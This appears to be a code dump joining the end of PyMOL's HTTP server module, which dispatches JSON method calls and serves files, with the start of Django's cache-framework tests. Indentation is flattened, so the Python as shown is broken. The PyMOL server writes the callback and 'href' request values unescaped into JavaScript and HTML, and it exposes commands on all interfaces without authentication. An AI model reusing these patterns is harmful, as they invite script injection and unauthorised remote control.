self.send_resp_header(200,'text/javascript')
self.wfile_write("%s(%s)"%(self.callback,self.wrap_return(result)))
else:
accept_mime = self.headers.get('Accept')
if accept_mime in _json_mime_types:
self.send_resp_header(200,accept_mime)
self.wfile_write(self.wrap_return(result))
else:
self.send_resp_header(200,'text/html')
self.wfile_write("PyMOL's JSON response: <pre>")
self.wfile_write(self.wrap_return(result,indent=4))
self.wfile_write("</pre>")
def send_json_error(self, code, message):
if self.callback is not None:
self.send_resp_header(code,'text/javascript')
self.wfile_write("%s(%s)"%(self.callback,self.wrap_return(message,"ERROR")))
else:
accept_mime = self.headers.get('Accept')
if accept_mime in _json_mime_types:
self.send_resp_header(code,accept_mime)
self.wfile_write(self.wrap_return(message,"ERROR"))
else:
self.send_resp_header(code,'text/html')
self.wfile_write("PyMOL's JSON response: <pre>")
self.wfile_write(self.wrap_return(message,"ERROR",indent=4))
self.wfile_write("</pre>")
def send_exception_json(self, code, message):
fp = StringIO.StringIO()
traceback.print_exc(file=fp)
tb = fp.getvalue()
message = message + tb.split('\n')
response = json.dumps(message)
if self.callback is not None:
self.send_resp_header(code, 'text/javascript')
self.wfile_write("%s(%s)"%(self.callback,response))
else:
accept_mime = self.headers.get('Accept')
if accept_mime in _json_mime_types:
self.send_resp_header(code,accept_mime)
self.wfile_write(response)
else:
self.send_resp_header(code,'text/html')
self.wfile_write("PyMOL's JSON response: <pre>")
self.wfile_write(json.dumps(json.loads(response),indent=4))
self.wfile_write("</pre>")
def pymol_apply(self,method):
"""
apply the appropriate method held in the session dictionary.
        supply the method arguments in the form of key/value pairs
"""
args = None
kwds = None
query_kwds = {}
send_multi_result_list = False
for k in self.fs.keys():
if k[0:1] == '_': # leading-underscore argument (special handling)
if k == '_callback':
self.callback = self.fs.getfirst(k)
elif k == '_json': # main path for Javascript API
method = json.loads(self.fs.getfirst(k))
# [ "my_method", [ arg1, ... ] , { 'key1' : 'val1, ... } ]
# or
# [ [ "my_met1", [ arg1, ... ], { 'key1' : 'val1, ... } ],
# [ "my_met2", [ arg1, ... ], { 'key1' : 'val1, ... } ] ]
elif k == '_method': # tentative, not in spec -- may disappear
# a method name "my_method"
method = json.loads(self.fs.getfirst(k))
elif k == '_args': # tentative, not in spec -- may disappear
args = json.loads(self.fs.getfirst(k))
elif k == '_kwds': # tentative, not in spec -- may disappear
kwds = json.loads(self.fs.getfirst(k))
# other underscore arguments are ignored (not passed on)
elif k[0:1] != '_':
query_kwds[k] = self.fs.getfirst(k)
blocks = []
if isinstance(method, str):
# method is merely a string
if kwds is None:
kwds = query_kwds
if args is None:
args = ()
if len(method):
blocks = [ [ method, args, kwds ] ]
elif isinstance(method, list) and len(method):
# method is a list
if not isinstance(method[0], list):
blocks = [ method ] # contains just [name, args, kwds]
else:
blocks = method
# contains [ [name, arg, kwds], [name, args, kwds], ... ]
send_multi_result_list = False # only return final result
else:
self.send_json_error(500,[ "Unable to apply method:", str(method)])
return
result = []
if len(blocks):
for block in blocks:
if self.server.pymol_logging:
print('applying: ' + str(block))
fn = self.session.get(block[0],None)
if fn is None and block[0].startswith('pymol.cmd.'):
fn = getattr(self.server.pymol_cmd, block[0][10:], None)
if fn is not None:
len_block = len(block)
if len_block>1:
args = tuple(block[1])
else:
args = ()
if len_block>2:
kwds = block[2]
else:
kwds = {}
try:
result.append( fn(*args, **kwds) )
except:
self.send_exception_json(500,
[ "Exception in: %s" %
block[0],
"Args: " + str(args) ,
"Kwds: " + str(kwds)])
return
else:
self.send_json_error(500,[ "Method not found:",
str(block) ])
return
if block[0] == '_quit': # special quit behavior
self.send_resp_header()
self.wfile_write("<html>")
href = None
if "href" in kwds:
href = str(kwds['href'])
elif len(args):
href = str(args[1])
if href is None:
self.wfile_write("<body>")
                    elif not len(href): # empty href: simply close the window
self.wfile_write("<body onload=\"window.close()\">")
else:
self.wfile_write(
"<body onload=\"document.location.replace('"+
kwds['href']+"')\">")
self.wfile_write("<p>PyMOL-HTTPd: Shutting down...</p>")
self.wfile_write("<p><i>Please close this window.</i></p>")
self.wfile_write("</body></html>")
self.wfile.flush()
self.server.pymol_cmd.quit()
return
if send_multi_result_list:
self.send_json_result(result)
elif len(result):
self.send_json_result(result[-1])
else:
self.send_json_result(None)
return
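    # For illustration (not part of the original spec): a concrete '_json'
    # payload and the reply shape produced by wrap_return() when wrap_natives
    # is enabled.  With a JSONP '_callback', the same JSON is wrapped in a
    # function call and served as text/javascript.  The object names in the
    # reply are made up.
    #
    #   _json  = '["pymol.cmd.get_names", [], {}]'
    #   reply  = '{"status": "OK", "result": ["obj1", "obj2"]}'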
def send_doc(self):
"""
send a document (file) in the current directory or any sub-directory
"""
path_list = self.path.split('/')[1:]
if '..' in path_list: # prevent access to parent directories
self.send_error(404,"Illegal path.")
self.wfile_write(": %s" % self.path)
elif self.server.pymol_root is None:
self.send_error(404,"No content root specified.")
else:
try:
full_path = os.path.join(*[self.server.pymol_root] +
list(path_list))
if os.path.isdir(full_path):
full_path = full_path + "/index.html"
fp = open(full_path,"rb")
self.send_resp_header(200,self.guess_mime(full_path))
self.wfile_write(fp.read())
fp.close()
except:
self.send_error(404,"Unable to locate document.")
self.wfile_write(": %s" % self.path)
self.wfile_write(str(sys.exc_info()))
# exc_info() is thread safe
# self.wfile.write(sys.exc_value) # exc_value not thread safe
def guess_mime(self,path):
"""
guess the mime type based on the file extension
"""
if path.endswith('.html'):
return 'text/html'
elif path.endswith('.js'):
return 'application/x-javascript'
elif path.endswith('.jpg'):
return 'image/jpeg'
elif path.endswith('.png'):
return 'image/png'
elif path.endswith('.gif'):
return 'image/gif'
elif path.endswith('.sdf'):
return 'chemical/x-mdl-sdfile'
elif path.endswith('.mol'):
return 'chemical/x-mdl-molfile'
elif path.endswith('.pwg'):
return 'application/x-pymol'
else:
return 'text/plain'
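    # guess_mime note: the standard library's mimetypes.guess_type() could
    # cover the generic entries above; the chemical/* and application/x-pymol
    # types would still need explicit registration, e.g.
    #   mimetypes.add_type('application/x-pymol', '.pwg')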
def send_error(self,errcode,errmsg):
self.send_response(errcode)
self.send_header('Content-type', 'text/plain')
self.send_header('Pragma','no-cache')
self.send_header('Cache-Control','no-cache, must-revalidate')
self.send_header('Expires','Sat, 10 Jan 2008 01:00:00 GMT')
self.end_headers()
self.wfile_write("PyMOL-HTTPd-Error: "+errmsg+"\n")
def send_resp_header(self, code=200, mime='text/html'):
self.send_response(code)
self.send_header('Content-type', mime)
self.send_header('Pragma','no-cache')
self.send_header('Cache-Control','no-cache, must-revalidate')
self.send_header('Expires','Sat, 10 Jan 2008 01:00:00 GMT')
self.end_headers()
def echo_args(self):
"""
for debugging requests
"""
self.wfile_write("%s\n" % self.command)
if (self.fs):
for k in self.fs.keys():
self.wfile_write("%s = " % k)
                # a key can have multiple values, as with checkboxes or any
                # other repeated form field
if (isinstance(self.fs[k], list)):
self.wfile_write("%s\n" % self.fs.getlist(k))
else:
# key can be uploaded file
if (self.fs[k].filename):
self.wfile_write("%s\n" % self.fs[k].filename)
fp = self.fs[k].file
#self.wfile.write("FILE %s" % cgi.escape(repr(fp)))
#self.wfile.write("%s\n" % fp.name)
# fails for StringIO instances
self.wfile_write("%s\n" % repr(fp))
# two ways to get file contents
#file_contents = self.fs.getvalue(k)
#file_contents = fp.read()
#self.wfile.write("%s" % file_contents)
else:
#plain-old key/value
self.wfile_write("%s\n" % self.fs.getvalue(k))
else:
self.wfile_write("No args\n")
# this is the public class we're exposing to PyMOL consortium members
class PymolHttpd:
def __init__(self, port=8080, root=None, logging=1, wrap_natives=0, self_cmd=None):
if self_cmd is None:
# fallback on the global singleton PyMOL API
try:
from pymol import cmd
self_cmd = cmd
except ImportError:
self_cmd = None
self.port = int(port)
self.stop_event = threading.Event()
self.stop_event.set()
self.root = root
self.cmd = self_cmd
session = {}
self.session = session
# Special methods for the web interface
session['_quit'] = lambda href=None,s=self:s.quit()
# JavaScript workarounds for keyword clashes
session['pymol.cmd.delete_'] = self_cmd.delete
session['pymol.cmd.super_'] = self_cmd.super
## Unsafe methods to workaround (uses eval)
session['pymol.cmd.label'] = self_cmd.label2 # no-eval version
self.server = BaseHTTPServer.HTTPServer(('', self.port),
_PymolHTTPRequestHandler)
self.server.wrap_natives = wrap_natives
if self.port == 0:
self.port = self.server.socket.getsockname()[1]
self.server.pymol_session = self.session
self.server.pymol_root = self.root
if self.root is not None:
os.environ['PYMOL_HTTP_ROOT'] = self.root
self.server.pymol_cmd = self.cmd
self.server.pymol_logging = logging
def _server_thread(self):
while not self.stop_event.isSet():
self.server.handle_request()
def start(self):
print ( " PyMOL-HTTPd: serving requests on http://localhost:%d" %
self.port )
t = threading.Thread(target=self._server_thread)
t.setDaemon(1)
self.stop_event.clear()
t.start()
def stop(self):
if not self.stop_event.isSet():
self.stop_event.set()
try: # create a request in order to release the handler
urlopen("http://localhost:%d" % self.port)
except:
pass
self.server.socket.close()
def quit(self):
self.stop_event.set()
def expose(self, name, value):
'''
exposes a Python method or symbol to the web services interface
'''
self.session[name] = value
# default behavior if run explicitly from PyMOL
if __name__ == 'pymol': # launched inside PyMOL
# initialize the server
server = PymolHttpd()
# handle_requests (fires off a separate thread)
server.start()
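# Usage sketch (hedged): launching the server manually from a PyMOL-side
# script and exposing an extra Python callable to web clients.  This assumes
# the PyMOL Python environment ("from pymol import cmd" succeeds), since
# __init__ above dereferences self_cmd unconditionally; the port number and
# htdocs path below are placeholders.
#
#   httpd = PymolHttpd(port=8081, root="/path/to/htdocs", logging=1)
#   httpd.expose('greet', lambda name='world': 'hello ' + name)
#   httpd.start()   # serves requests from a daemon thread
#   ...
#   httpd.stop()    # issues a dummy request to unblock the handler, then closes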
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
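# For illustration: custom_key_func('answer', 'prefix', 1) returns
# 'CUSTOM-prefix-1-answer'; the 'custom_key' and 'custom_key2' aliases below
# plug this function in via KEY_FUNCTION.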
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
    # `params` are test-specific overrides and `_caches_setting_base` is the
    # base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
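# Worked example for caches_setting_for_tests (hypothetical values): with
# base={'BACKEND': 'x'} and params={'TIMEOUT': 5}, the 'v2' alias ends up as
# {'BACKEND': 'x', 'VERSION': 2, 'TIMEOUT': 5} -- params override
# _caches_setting_base, which in turn overrides base.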
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
        # Test for cache key conflicts between caches that share a backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
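        # 30 days = 60*60*24*30 = 2,592,000 seconds; memcached interprets any
        # larger timeout as an absolute Unix timestamp rather than an offset.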
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
